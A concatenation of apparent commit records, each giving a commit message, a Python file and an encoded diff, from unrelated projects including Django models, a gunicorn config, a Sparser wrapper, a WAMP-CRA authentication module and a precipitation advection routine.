    def __init__(self, pivot, **backends):
        self.__backends = backends
        self.__pivot = pivot
        self.__backend = None

    def __get_backend(self):
        if not self.__backend:
            backend_name = self.__pivot.value
            if backend_name not in self.__backends:
                raise exception.Error('Invalid backend: %s' % backend_name)

            backend = self.__backends[backend_name]
            if type(backend) == type(tuple()):
                name = backend[0]
                fromlist = backend[1]
            else:
                name = backend
                fromlist = backend

            self.__backend = __import__(name, None, None, fromlist)
            logging.info('backend %s', self.__backend)
        return self.__backend

    def __getattr__(self, key):
        backend = self.__get_backend()
        return getattr(backend, key)


def deferredToThread(f):
    def g(*args, **kwargs):
        return deferToThread(f, *args, **kwargs)
    return g


def xhtml_escape(value):
    """Escapes a string so it is valid within XML or XHTML.

    Code is directly from the utf8 function in
    http://github.com/facebook/tornado/blob/master/tornado/escape.py
    """
    return saxutils.escape(value, {'"': "&quot;"})


def utf8(value):
    """Try to turn a string into utf-8 if possible.

    Code is directly from the utf8 function in
    http://github.com/facebook/tornado/blob/master/tornado/escape.py
    """
    if isinstance(value, unicode):
        return value.encode("utf-8")
    assert isinstance(value, str)
    return value

lang: Python
proba: 0
diff:
@@ -4800,12 +4800,11 @@ OCK_ -STRE +DGR AM)%0A @@ -4831,22 +4831,15 @@ t((' -www.google.com +8.8.8.8 ', 8
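Decoded from the percent-encoded hunks above (a reconstruction, not part of the record), the patch appears to switch the probe in get_my_ip() to a UDP socket aimed at the 8.8.8.8 public DNS address:

    csock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    csock.connect(('8.8.8.8', 80))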
73b66a32763b7efe36612db7f3a3b4566d8e44a2
set uid=197610(OIdiot) gid=197610 groups=197610 as primary_key instead of
app/models.py
app/models.py
from django.db import models

# Create your models here.
class Person(models.Model):
	student_number = models.CharField(verbose_name = '学号', max_length = 12, unique = True, primary_key = True)
	name = models.CharField(verbose_name = '姓名', max_length = 10)
	pinyin = models.CharField(verbose_name = '拼音', max_length = 25)
	gender = models.CharField(verbose_name = '性别', choices = (('F', 'Female'), ('M', 'Male')), max_length = 2)
	native_province = models.CharField(verbose_name = '籍贯', max_length = 10, blank = True)
	dormitory = models.CharField(verbose_name = '寝室', blank = True, max_length = 7)
	birthday = models.DateField(verbose_name = '生日', blank = True)
	phone_number = models.CharField(verbose_name = '手机号码', max_length = 11, blank = True)
	position = models.CharField(verbose_name = '职务', max_length = 20, blank = True)
	participation = models.PositiveSmallIntegerField(verbose_name = '活动参与分', default = 0)

	def __unicode__(self):
		return self.name

	def __str__(self):
		return self.name

class Activity(models.Model):
	id = models.AutoField(verbose_name = '索引', primary_key = True, unique = True)
	name = models.CharField(verbose_name = '活动名称', max_length = 15)
	date = models.DateField(verbose_name = '日期', blank = True)
	time = models.TimeField(verbose_name = '开始时间', blank = True)
	place = models.CharField(verbose_name = '地点', max_length = 15, blank = True)
	content = models.TextField(verbose_name = '内容', blank = True)
	participation = models.SmallIntegerField(verbose_name = '参与得分', default = 0)
	participator = models.TextField(verbose_name = '参与者学号', blank = True)
	images = models.TextField(verbose_name = '相关图片urls', blank = True)

	def __unicode__(self):
		return self.name

	def __str__(self):
		return self.name
Python
0.000001
@@ -80,16 +80,95 @@ Model):%0A +%09id = models.AutoField(verbose_name = '%E7%B4%A2%E5%BC%95', primary_key = True, unique = True)%0A %09student @@ -244,28 +244,8 @@ ue = - True, primary_key = Tru
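Decoding the hunks suggests Person gains an explicit auto-increment primary key while student_number keeps only its unique constraint; a reconstruction of the patched lines:

	class Person(models.Model):
		id = models.AutoField(verbose_name = '索引', primary_key = True, unique = True)
		student_number = models.CharField(verbose_name = '学号', max_length = 12, unique = True)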
68170652d104873ea4fa210daaedb05ba9bf3b44
Wrong syntax
config/gunicorn_conf.py
config/gunicorn_conf.py
import os
import psutil
import math

GIGS_OF_MEMORY = psutil.virtual_memory().total/1024/1024/1024.
NUM_CPUS = psutil.cpu_count()

bind = "0.0.0.0:8000"
pidfile = "/srv/newsblur/logs/gunicorn.pid"
logfile = "/srv/newsblur/logs/production.log"
accesslog = "/srv/newsblur/logs/production.log"
errorlog = "/srv/newsblur/logs/errors.log"
loglevel = "info"
name = "newsblur"
timeout = 120
max_requests = 1000
x_forwarded_for_header = "X-FORWARDED-FOR"
forwarded_allow_ips = "*"
limit_request_line = 16000
limit_request_fields = 1000
worker_tmp_dir = /dev/shm

if GIGS_OF_MEMORY > NUM_CPUS:
    workers = NUM_CPUS
else:
    workers = int(NUM_CPUS / 2)

if workers <= 4:
    workers = max(int(math.floor(GIGS_OF_MEMORY * 1000 / 512)), 4)

if workers > 8:
    workers = 8

if os.environ.get('DOCKERBUILD', False):
    workers = 1
Python
0.930983
@@ -542,16 +542,17 @@ r = +%22 /dev/shm %0A%0Aif @@ -547,16 +547,17 @@ /dev/shm +%22 %0A%0Aif GIG
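Decoded, the one-line fix quotes the bare path so the config parses as Python:

    worker_tmp_dir = "/dev/shm"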
c908db488f3e1d7aab0993780b38baaf4c995eb1
add docstrings
Lib/fontelemetry/datastructures/source.py
Lib/fontelemetry/datastructures/source.py
# Copyright 2019 Fontelemetry Authors and Contributors
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

# Library version
from fontelemetry import __version__


# -----------------------
# Base classes
# -----------------------
class Source(object):
    def __init__(self, source_object, path=None, source_id=None):
        self.obj = source_object
        self.path = path
        self.id = source_id

    def __repr__(self):
        return "({} v{} is defined as: {})".format(self.__class__, __version__, self.__dict__)

    def __str__(self):
        return "{}".format(self.__dict__)

    def get_source_path(self):
        return self.path

    def yield_ordered_glyphobj(self):
        raise NotImplementedError


# ------------------------------------
# Inherited classes
# ------------------------------------
class GlyphsSource(Source):
    def __init__(self, source_object, path=None, source_id=None):
        Source.__init__(self, source_object, path=path, source_id=source_id)

    def yield_ordered_glyphobj(self):
        for glyph in self.obj.glyphs:
            yield glyph


class UFOSource(Source):
    def __init__(self, source_object, path=None, source_id=None):
        Source.__init__(self, source_object, path=path, source_id=source_id)

    def yield_ordered_glyphobj(self):
        # TODO
        pass
Python
0
@@ -746,69 +746,1194 @@ -def __init__(self, source_object, path=None, source_id=None): +%22%22%22A source specification specific object that holds source data.%0A%0A The Source object is instantiated with an external library object that%0A is instantiated on source read and used to manipulate source file data%0A along with object attributes that maintain the original source file path%0A and define a retrievable calling code defined unique ID field.%0A%0A Attributes:%0A obj: (instance-specific) A source file object that is instantiated with an external library%0A path: (string) source file or directory path%0A id: (string) unique ID for an instantiated Source object%0A%0A For glyphs source, the object is a glyphsLib.GSFont object.%0A For UFO source, the object is a fontTools.ufoLib.glifLib.GlyphSet object%0A %22%22%22%0A def __init__(self, source_object, path=None, source_id=None):%0A %22%22%22Inits Source object with source file read data from external libraries.%0A%0A Args:%0A source_object: (instance-specific) A source file object that is instantiated with an external library%0A path: (string) path to file or directory used to instantiate source_object%0A source_id: (string) unique ID value for this object%0A %22%22%22 %0A @@ -2225,32 +2225,84 @@ rce_path(self):%0A + %22%22%22Returns source path attribute string.%22%22%22%0A return s @@ -2341,32 +2341,113 @@ glyphobj(self):%0A + %22%22%22Generator that yields ordered external library glyph-level objects%22%22%22%0A raise No @@ -2584,32 +2584,58 @@ Source(Source):%0A + %22%22%22See base class.%22%22%22%0A def __init__ @@ -2864,16 +2864,16 @@ glyph%0A%0A%0A - class UF @@ -2885,24 +2885,50 @@ ce(Source):%0A + %22%22%22See base class.%22%22%22%0A def __in
decbdb176121830dbaffe5db0596b0567be57a76
Make char parser public and document module better
npc/parser.py
npc/parser.py
""" Parse character files into Character objects """ import re import itertools from os import path, walk from .util import Character def get_characters(search_paths=None, ignore_paths=None): """ Get data from character files Normalizes the ignore paths with os.path.normpath. Args: search_paths (list): Paths to search for character files ignore_paths (list): Paths to exclude from the search Returns: List of Characters containing parsed character information """ if search_paths is None: search_paths = ['.'] if ignore_paths: ignore_paths[:] = [path.normpath(d) for d in ignore_paths] return itertools.chain.from_iterable((_parse_path(path, ignore_paths) for path in search_paths)) def _parse_path(start_path, ignore_paths=None, include_bare=False): """ Parse all the character files under a directory Args: start_path (str): Path to search ignore_paths (list): Paths to exclude. Assumed to be normalized, as from os.path.normpath. include_bare (bool): Whether to attempt to parse files without an extension in addition to .nwod files. Returns: List of Characters containing parsed character data """ if path.isfile(start_path): return [_parse_character(start_path)] if ignore_paths is None: ignore_paths = [] characters = [] for dirpath, _, files in _walk_ignore(start_path, ignore_paths): for name in files: target_path = path.join(dirpath, name) if target_path in ignore_paths: # skip ignored files continue _, ext = path.splitext(name) if ext == '.nwod' or (include_bare and not ext): data = _parse_character(target_path) characters.append(data) return characters def _walk_ignore(root, ignore): """ Recursively traverse a directory tree while ignoring certain paths. Args: root (str): Directory to start at ignore (list): Paths to skip over Yields: A tuple (path, [dirs], [files]) as from `os.walk`. """ def should_search(base, check): """ Determine whether a path should be searched Only skips this path if it, or its parent, is explicitly in the `ignore` list. Args: base (str): Parent path check (str): The path to check Returns: True if d should be searched, false if it should be ignored """ return base not in ignore \ and path.join(base, check) not in ignore for dirpath, dirnames, filenames in walk(root, followlinks=True): dirnames[:] = [d for d in dirnames if should_search(dirpath, d)] yield dirpath, dirnames, filenames def _parse_character(char_file_path: str) -> Character: """ Parse a single character file Args: char_file_path (str): Path to the character file to parse Returns: Character object. Most keys store a list of values from the character. The `description` key stores a simple string, and the `rank` key stores a dict of list entries. Those keys are individual group names. """ name_re = re.compile(r'(?P<name>[\w]+\.?(?:\s[\w.]+)*)(?: - )?.*') section_re = re.compile(r'^--.+--\s*$') tag_re = re.compile(r'^@(?P<tag>\w+)\s+(?P<value>.*)$') # Group-like tags. These all accept an accompanying `rank` tag. 
group_tags = ['group', 'court', 'motley'] # derive character name from basename basename = path.basename(char_file_path) match = name_re.match(path.splitext(basename)[0]) # instantiate new character parsed_char = Character(name=[match.group('name')]) with open(char_file_path, 'r') as char_file: last_group = '' previous_line_empty = False for line in char_file: # stop processing once we see game stats if section_re.match(line): break match = tag_re.match(line) if match: tag = match.group('tag') value = match.group('value') if tag == 'changeling': # grab attributes from compound tag bits = value.split(maxsplit=1) parsed_char.append('type', 'Changeling') if len(bits): parsed_char.append('seeming', bits[0]) if len(bits) > 1: parsed_char.append('kith', bits[1]) continue if tag == 'realname': # replace the first name parsed_char['name'][0] = value continue if tag in group_tags: last_group = value if tag == 'rank': if last_group: parsed_char.append_rank(last_group, value) continue else: if line == "\n": if not previous_line_empty: previous_line_empty = True else: continue else: previous_line_empty = False parsed_char.append('description', line) continue parsed_char.append(tag, value) parsed_char['description'] = parsed_char['description'].strip() parsed_char['path'] = char_file_path return parsed_char
Python
0
@@ -41,16 +41,146 @@ objects +%0A%0AThe main entry point is get_characters, which creates a list of characters. To%0Aparse a single file, use parse_character instead. %0A%22%22%22%0A%0Aim @@ -594,33 +594,46 @@ racters -containing +generated from every parse -d +able charact @@ -639,19 +639,80 @@ ter -information +file within%0A every path of search_paths, but not in ignore_paths. %0A @@ -1426,25 +1426,38 @@ ers -containing +generated from every parse -d +able cha @@ -1463,20 +1463,72 @@ aracter -data +file within%0A start_path, but not in ignore_paths. %0A %22%22%22 @@ -1576,17 +1576,16 @@ return %5B -_ parse_ch @@ -2059,17 +2059,16 @@ data = -_ parse_ch @@ -3107,25 +3107,24 @@ enames%0A%0Adef -_ parse_charac
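Decoded, the hunks strip the leading underscore from _parse_character at its definition and both call sites (and reword the module and function docstrings), so for example:

    if path.isfile(start_path):
        return [parse_character(start_path)]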
0e913b3fc20e69a6ff77bafcc144e00175f8ed83
Put new classes to submodule level import
indra/assemblers/english/__init__.py
indra/assemblers/english/__init__.py
from .assembler import EnglishAssembler
Python
0.000001
@@ -32,9 +32,48 @@ ssembler +, AgentWithCoordinates, SentenceBuilder %0A
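Decoded, the patched import reads:

    from .assembler import EnglishAssembler, AgentWithCoordinates, SentenceBuilder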
6566ef14ff19640c238ba935ff21643d554b4654
Fix breakage when celery is running
indico/core/celery/__init__.py
indico/core/celery/__init__.py
# This file is part of Indico.
# Copyright (C) 2002 - 2018 European Organization for Nuclear Research (CERN).
#
# Indico is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# Indico is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Indico; if not, see <http://www.gnu.org/licenses/>.

from __future__ import unicode_literals

from datetime import timedelta

from celery.schedules import crontab
from celery.signals import beat_init, import_modules
from flask import session

import indico
from indico.core import signals
from indico.core.celery.core import IndicoCelery
from indico.core.config import config
from indico.core.db import db
from indico.core.settings import SettingsProxy
from indico.core.settings.converters import DatetimeConverter
from indico.util.date_time import now_utc
from indico.util.i18n import _
from indico.web.flask.templating import template_hook
from indico.web.flask.util import url_for
from indico.web.menu import SideMenuItem


__all__ = ('celery',)


#: The Celery instance for all Indico tasks
celery = IndicoCelery('indico')

celery_settings = SettingsProxy('celery', {
    'last_ping': None,
    'last_ping_version': None
}, converters={
    'last_ping': DatetimeConverter
})


@signals.app_created.connect
def _load_default_modules(app, **kwargs):
    celery.loader.import_default_modules()  # load all tasks


@import_modules.connect
def _import_modules(*args, **kwargs):
    import indico.core.emails
    import indico.util.tasks
    signals.import_tasks.send()


@beat_init.connect
def _send_initial_heartbeat(*args, **kwargs):
    heartbeat.delay(initial=True)


@signals.menu.items.connect_via('admin-sidemenu')
def _extend_admin_menu(sender, **kwargs):
    if session.user.is_admin:
        return SideMenuItem('celery', _("Tasks"), url_for('celery.index'), 20, icon='time')


@template_hook('global-announcement', priority=-100, markup=False)
def _inject_announcement_header(**kwargs):
    if not session.user or not session.user.is_admin or config.DISABLE_CELERY_CHECK:
        return
    last_ping = celery_settings.get('last_ping')
    last_ping_version = celery_settings.get('last_ping_version')
    down = not last_ping or (now_utc() - last_ping) > timedelta(hours=1)
    mismatch = last_ping_version and last_ping_version != indico.__version__
    if down:
        text = _("The Celery task scheduler does not seem to be running. This means that email sending and periodic "
                 "tasks such as event reminders do not work.")
    elif mismatch:
        text = _("The Celery task scheduler is running a different Indico version.")
    return ('warning', text, True)


@celery.periodic_task(name='heartbeat', run_every=crontab(minute='*/30'))
def heartbeat(initial=False):
    celery_settings.set('last_ping', now_utc())
    if initial:
        celery_settings.set('last_ping_version', indico.__version__)
    db.session.commit()
Python
0.000172
@@ -3036,16 +3036,40 @@ +else:%0A return%0A return -( 'war @@ -3081,25 +3081,24 @@ , text, True -) %0A%0A%[email protected]
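Read back, the hunks appear to add an early return for the healthy case (so the final statement can no longer be reached with text unbound, matching the "Fix breakage when celery is running" subject) and drop the parentheses around the returned tuple:

    else:
        return
    return 'warning', text, True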
a8e3a0b7896403d5d9de9edf147693befc90493d
Use SSL.
securelayer/views.py
securelayer/views.py
# -*- coding: utf-8 -*-
# (c) 2010-2011 Ruslan Popov <[email protected]>

from django.conf import settings

from django import forms
from django.http import Http404
from django.utils import simplejson
from django.utils.translation import ugettext_lazy as _
from django.shortcuts import redirect

from securelayer.http import Http

import gnupg

class NextStep(forms.Form):
    """ This form is used to redirect a client to SecureLayer site."""
    data = forms.CharField(widget=forms.HiddenInput)

def sign_this(data):
    """ Converts the data into GPG signed JSON. """
    jsonified = simplejson.dumps(data)
    gpg = gnupg.GPG(gnupghome=settings.GPG_HOMEDIR)
    signed = gpg.sign(jsonified, passphrase=settings.GPG_PASSPHRASE)
    return signed.data.decode('utf-8')

def secured_request(url, params={}, session_key=None):
    """ Realizes data transfer through SSL.

    Sends params to URL. Uses Cookies."""
    http = Http(settings.SECURELAYER_HOST, settings.SECURELAYER_PORT)
    if session_key:
        http.session_id = session_key
    if http.request(url, 'POST', {'data': sign_this(params)}):
        response = http.parse()
        if response.get('status', None) == 200:
            return (True, response, http.session_id)
    else:
        response = {
            'status': 598,
            'desc': _('Request error.')
            }
    return (False, response, None)

def use_secured_form(request, form, context, caption, desc):
    """ Processes client's data through SecureLayer site."""
    if request.method == 'GET':
        session_key = request.GET.get('ss', None)
        if session_key:
            ready, response, cookie = secured_request(
                '/api/', {'service': 'data'}, session_key)
            form.import_json(response.get('data', None))
            return form
        else:
            context.update(
                {'action': 'http://%s:%s/show/' % (
                    settings.SECURELAYER_HOST,
                    settings.SECURELAYER_PORT),
                 'button_list': [{'title': _(u'Redirect'),
                                  'name': 'redirect',
                                  'type': 'submit'},],
                 'body': _(u'You will be redirected on SecureLayer '
                           'for secure data entering.')}
                )
            params = {
                'return_to': request.build_absolute_uri(),
                'form': form.as_json(caption=caption, desc=desc)
                }
            return NextStep(initial={'data': sign_this(params)})
    else:
        # пост придти в эту форму не может
        raise Http404

def form(local_form, caption=None, desc=None):
    """ SecureLayer's Decorator. """
    def renderer(view):
        def wrapper(request, *args, **kwargs):
            context = {
                'action': '.',
                'body': _(u'The data would be transferred by open channel.'),
                }
            check = ready, status, session_key = \
                    secured_request('/api/', {'service': 'check'})
            if not ready:
                form = local_form(request.POST or None, *args, **kwargs)
            else:
                form = use_secured_form(request, local_form(), context,
                                        caption, desc)
            form.request = request
            return view(request, form, context, check, *args, **kwargs)
        return wrapper
    return renderer
Python
0
@@ -973,16 +973,25 @@ YER_PORT +, 'https' )%0A if @@ -1848,16 +1848,17 @@ ': 'http +s ://%25s:%25s
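Decoded, the two hunks move the exchange to HTTPS: the redirect action string becomes 'https://%s:%s/show/', and the connection gains a scheme argument:

    http = Http(settings.SECURELAYER_HOST, settings.SECURELAYER_PORT, 'https')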
36608c6bd0035e4a78da2cd30d9fcca2c660ec3a
Add prepare in rpc client
common/numeter/queue/client.py
common/numeter/queue/client.py
from oslo import messaging
from oslo.config import cfg

import logging
LOG = logging.getLogger(__name__)


class BaseAPIClient(messaging.RPCClient):
    def __init__(self, transport):
        target = messaging.Target(topic='default_topic')
        super(BaseAPIClient, self).__init__(transport, target)

    def ping(self, context, topic, args=None):
        print 'Launch ping topic=%s' % topic
        cctxt = self.prepare(topic=topic)
        #return cctxt.call(context,'ping', args=args)
        return cctxt.cast(context,'ping', args=args)

    def poller_msg(self, context, topic, args=None):
        LOG.info('Send message %s context %s' % (topic, context))
        args['topic'] = topic
        return self.cast(context,'poller_msg', args=args)


def get_rpc_client(hosts=[]):
    conf = cfg.CONF
    conf.transport_url = 'rabbit://'
    conf.rabbit_max_retries = 1
    conf.rabbit_hosts = hosts
    transport = messaging.get_transport(conf)
    return BaseAPIClient(transport)
Python
0
@@ -670,29 +670,41 @@ -args%5B'topic'%5D = +cctxt = self.prepare(topic= topic +) %0A @@ -715,20 +715,21 @@ return -self +cctxt .cast(co
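Decoded, poller_msg() switches to a prepared call context, mirroring ping() above it:

    def poller_msg(self, context, topic, args=None):
        LOG.info('Send message %s context %s' % (topic, context))
        cctxt = self.prepare(topic=topic)
        return cctxt.cast(context,'poller_msg', args=args)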
bead9f9051ca1ca9b1823547732e847dd86e1ea1
Add verbose
pysteps/advection/semilagrangian.py
pysteps/advection/semilagrangian.py
"""Implementation of the semi-Lagrangian method of Germann et al (2002). """ import numpy as np import scipy.ndimage.interpolation as ip def extrapolate(R, V, num_timesteps, outval=np.nan, **kwargs): """Apply semi-Lagrangian extrapolation to a two-dimensional precipitation field. Parameters ---------- R : array-like Array of shape (m,n) containing the input precipitation field. V : array-like Array of shape (2,m,n) containing the x- and y-components of the m*n advection field. num_timesteps : int Number of time steps to extrapolate. outval : float Optional argument for specifying the value for pixels advected from outside the domain. If outval is set to 'min', the value is taken as the minimum value of R. Default : np.nan Optional kwargs: --------------- D_prev : array-like Optional initial displacement vector field of shape (2,m,n) for the extrapolation. Default : None n_iter : int Number of inner iterations in the semi-Lagrangian scheme. Default : 3 inverse : bool If True, the extrapolation trajectory is computed backward along the flow (default), forward otherwise. Default : True return_displacement : bool If True, return the total advection velocity (displacement) between the initial input field and the advected one integrated along the trajectory. Default : False Returns ------- out : array or tuple If return_displacement=False, return a time series extrapolated fields of shape (num_timesteps,m,n). Otherwise, return a tuple containing the extrapolated fields and the total displacement along the advection trajectory. """ if len(R.shape) != 2: raise ValueError("R must be a two-dimensional array") if len(V.shape) != 3: raise ValueError("V must be a three-dimensional array") # defaults D_prev = kwargs.get("D_prev", None) n_iter = kwargs.get("n_iter", 3) inverse = kwargs.get("inverse", True) return_displacement = kwargs.get("return_displacement", False) if outval == "min": outval = np.nanmin(R) coeff = 1.0 if not inverse else -1.0 X,Y = np.meshgrid(np.arange(V.shape[2]), np.arange(V.shape[1])) XY = np.stack([X, Y]) R_e = [] if D_prev is None: D = np.zeros((2, V.shape[1], V.shape[2])) else: D = D_prev.copy() for t in range(num_timesteps): V_inc = np.zeros(D.shape) for k in range(n_iter): if t > 0 or k > 0 or D_prev is not None: XYW = XY + D - V_inc / 2.0 XYW = [XYW[1, :, :], XYW[0, :, :]] VWX = ip.map_coordinates(V[0, :, :], XYW, mode="nearest", order=0, prefilter=False) VWY = ip.map_coordinates(V[1, :, :], XYW, mode="nearest", order=0, prefilter=False) else: VWX = V[0, :, :] VWY = V[1, :, :] V_inc[0, :, :] = VWX / n_iter V_inc[1, :, :] = VWY / n_iter D += coeff * V_inc XYW = XY + D XYW = [XYW[1, :, :], XYW[0, :, :]] IW = ip.map_coordinates(R, XYW, mode="constant", cval=outval, order=0, prefilter=False) R_e.append(np.reshape(IW, R.shape)) if not return_displacement: return np.stack(R_e) else: return np.stack(R_e), D
Python
0.999999
@@ -130,16 +130,28 @@ on as ip +%0Aimport time %0A%0Adef ex @@ -2031,16 +2031,71 @@ efaults%0A + verbose = kwargs.get(%22verbose%22, False)%0A D_pr @@ -2311,24 +2311,144 @@ False)%0A %0A + if verbose:%0A print(%22Computing the advection with the semi-lagrangian scheme.%22)%0A t0 = time.time()%0A %0A if outva @@ -3781,16 +3781,98 @@ shape))%0A + %0A if verbose:%0A print(%22--- %25s seconds ---%22 %25 (time.time() - t0))%0A %0A
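Decoded, the patch adds an import time, a verbose kwarg, and wall-clock reporting around the extrapolation; a reconstruction of the added lines (placement follows the hunk offsets):

    verbose = kwargs.get("verbose", False)

    if verbose:
        print("Computing the advection with the semi-lagrangian scheme.")
        t0 = time.time()

    if verbose:
        print("--- %s seconds ---" % (time.time() - t0))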
34a811429e2025f396f8997aeb628253487537fb
Change Sparser call pattern along with actual exec
indra/sources/sparser/sparser_api.py
indra/sources/sparser/sparser_api.py
from __future__ import absolute_import, print_function, unicode_literals
from builtins import dict, str
import os
import logging
import subprocess
import xml.etree.ElementTree as ET
from indra.util import UnicodeXMLTreeBuilder as UTB
from .processor import SparserProcessor

logger = logging.getLogger('sparser')

sparser_path_var = 'SPARSERPATH'
sparser_path = os.environ.get(sparser_path_var)


def process_xml(xml_str):
    try:
        tree = ET.XML(xml_str, parser=UTB())
    except ET.ParseError as e:
        logger.error('Could not parse XML string')
        logger.error(e)
        return None
    sp = _process_elementtree(tree)
    return sp


def process_nxml(fname, output_format='json'):
    if not sparser_path or not os.path.exists(sparser_path):
        logger.error('Sparser executable not set in %s' % sparser_path_var)
        return None
    if output_format == 'xml':
        format_flag = '-x'
        suffix = '.xml'
    elif output_format == 'json':
        format_flag = '-j'
        suffix = '.json'
    else:
        logger.error('Unknown output format: %s' % output_format)
    subprocess.call([sparser_path, format_flag, fname])
    output_fname = fname.split('.')[0] + '-semantics' + suffix
    with open(output_fname, 'rb') as fh:
        json_dict = json.load(fh)
    return process_json_dict(json_dict)


def process_json_dict(json_dict):
    sp = SparserJSONProcessor(json_dict)
    sp.get_statements()
    return sp


def _process_elementtree(tree):
    sp = SparserXMLProcessor(tree)
    sp.get_modifications()
    sp.get_activations()
    return sp
Python
0
@@ -107,16 +107,28 @@ port os%0A +import json%0A import l @@ -269,16 +269,41 @@ Sparser +XMLProcessor, SparserJSON Processo @@ -1131,16 +1131,88 @@ format)%0A + sparser_exec_path = os.path.join(sparser_path, 'save-semantics.sh')%0A subp @@ -1228,24 +1228,29 @@ ll(%5Bsparser_ +exec_ path, format @@ -1358,17 +1358,17 @@ name, 'r -b +t ') as fh
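Decoded, the patch imports json, imports SparserXMLProcessor and SparserJSONProcessor explicitly, invokes Sparser through its save-semantics.sh wrapper, and reads the output as text:

    sparser_exec_path = os.path.join(sparser_path, 'save-semantics.sh')
    subprocess.call([sparser_exec_path, format_flag, fname])

    with open(output_fname, 'rt') as fh: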
9271eea8191a5be0fd74d9b3be72acf1f3d6a213
Store challenge, signature as str/unicode for JSON serialization
crossbar/router/auth.py
crossbar/router/auth.py
#####################################################################################
#
#  Copyright (C) Tavendo GmbH
#
#  Unless a separate license agreement exists between you and Tavendo GmbH (e.g. you
#  have purchased a commercial license), the license terms below apply.
#
#  Should you enter into a separate license agreement after having received a copy of
#  this software, then the terms of such license agreement replace the terms below at
#  the time at which such license agreement becomes effective.
#
#  In case a separate license agreement ends, and such agreement ends without being
#  replaced by another separate license agreement, the license terms below apply
#  from the time at which said agreement ends.
#
#  LICENSE TERMS
#
#  This program is free software: you can redistribute it and/or modify it under the
#  terms of the GNU Affero General Public License, version 3, as published by the
#  Free Software Foundation. This program is distributed in the hope that it will be
#  useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
#  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
#
#  See the GNU Affero General Public License Version 3 for more details.
#
#  You should have received a copy of the GNU Affero General Public license along
#  with this program. If not, see <http://www.gnu.org/licenses/agpl-3.0.en.html>.
#
#####################################################################################

from __future__ import absolute_import

import json

from autobahn import util
from autobahn.wamp import auth

__all__ = (
    'PendingAuth',
    'PendingAuthPersona',
    'PendingAuthWampCra',
    'PendingAuthTicket'
)


class PendingAuth:
    """
    Base class for pending WAMP authentications.
    """


class PendingAuthPersona(PendingAuth):
    """
    Pending Mozilla Persona authentication.
    """

    def __init__(self, provider, audience, role=None):
        self.authmethod = u"mozilla_persona"
        self.provider = provider
        self.audience = audience
        self.role = role


class PendingAuthWampCra(PendingAuth):
    """
    Pending WAMP-CRA authentication.
    """

    def __init__(self, session, authid, authrole, authprovider, secret):
        """
        :param session: The WAMP session ID of the session being authenticated.
        :type session: int
        :param authid: The authentication ID of the authenticating principal.
        :type authid: unicode
        :param authrole: The role under which the principal will be authenticated when
            the authentication succeeds.
        :type authrole: unicode
        :param authprovider: Optional authentication provider.
        :type authprovider: unicode or None
        :param secret: The secret of the principal being authenticated. Either a password
            or a salted password.
        :type secret: str
        """
        self.session = session
        self.authmethod = u"wampcra"
        self.authid = authid
        self.authrole = authrole
        self.authprovider = authprovider

        challenge_obj = {
            'authid': self.authid,
            'authrole': self.authrole,
            'authmethod': u'wampcra',
            'authprovider': self.authprovider,
            'session': self.session,
            'nonce': util.newid(),
            'timestamp': util.utcnow()
        }

        # challenge must be bytes
        self.challenge = json.dumps(challenge_obj, ensure_ascii=False).encode('utf8')

        self.signature = auth.compute_wcs(secret, self.challenge)


class PendingAuthTicket(PendingAuth):
    """
    Pending Ticket-based authentication.
    """

    def __init__(self, realm, authid, authrole, authprovider, ticket):
        """
        :param authid: The authentication ID of the authenticating principal.
        :type authid: unicode
        :param authrole: The role under which the principal will be authenticated when
            the authentication succeeds.
        :type authrole: unicode
        :param authprovider: Optional authentication provider (URI of procedure to call).
        :type authprovider: unicode or None
        :param ticket: The secret/ticket the authenticating principal will need to
            provide (or `None` when using dynamic authenticator).
        :type ticket: bytes or None
        """
        self.authmethod = u"ticket"
        self.realm = realm
        self.authid = authid
        self.authrole = authrole
        self.authprovider = authprovider
        self.ticket = ticket
Python
0
@@ -3361,42 +3361,8 @@ %7D%0A%0A - # challenge must be bytes%0A @@ -3431,23 +3431,8 @@ lse) -.encode('utf8') %0A @@ -3492,16 +3492,47 @@ hallenge +.encode('utf8')).decode('ascii' )%0A%0A%0Aclas
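Decoded, the challenge now stays a unicode string (JSON-serializable) and only the WCS computation sees bytes, matching the record's subject:

    self.challenge = json.dumps(challenge_obj, ensure_ascii=False)
    self.signature = auth.compute_wcs(secret, self.challenge.encode('utf8')).decode('ascii')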
a9365aa4a32fbe358a6f74b5730a7a3a0a8b3cda
Convert journal to pickled extra
qualia/journal.py
qualia/journal.py
import datetime
import sqlite3

class Journal:
	def __init__(self, filename):
		self.db = sqlite3.connect(
			filename,
			detect_types = sqlite3.PARSE_DECLTYPES
		)
		self.upgrade_if_needed()

		self.f = open(filename, 'ab')

	def upgrade_if_needed(self):
		version = self.db.execute('PRAGMA user_version').fetchone()[0]

		if version < 1:
			self.db.executescript("""
				CREATE TABLE journal (
					serial INTEGER PRIMARY KEY,
					timestamp TIMESTAMP,
					source TEXT,
					file TEXT,
					op TEXT,
					extra BLOB
				);
			""")

		self.db.execute("PRAGMA user_version = 1")

	def append(self, source, file, op, *args, time = None):
		cur = self.db.cursor()
		cur.execute('''
			INSERT INTO journal(timestamp, source, file, op, extra)
				VALUES(?, ?, ?, ?, ?)
		''', (time or datetime.datetime.now(), source, file, op, (b'\t'.join(str(arg).encode('unicode-escape') for arg in args))))
		self.db.commit()
Python
0.999999
@@ -1,22 +1,50 @@ import -datetim +base64%0Aimport datetime%0Aimport pickl e%0Aimport @@ -857,73 +857,28 @@ op, -(b'%5Ct'.join(str(arg).encode('unicode-escape') for arg in +pickle.dumps( args))) -) %0A%09%09s
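Decoded, the hand-rolled tab-joined encoding of args is replaced by pickling (with base64 and pickle added to the imports):

	''', (time or datetime.datetime.now(), source, file, op, pickle.dumps(args)))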
ce6e67890b5860d89e9c3ea6628a7a94ad9e10b3
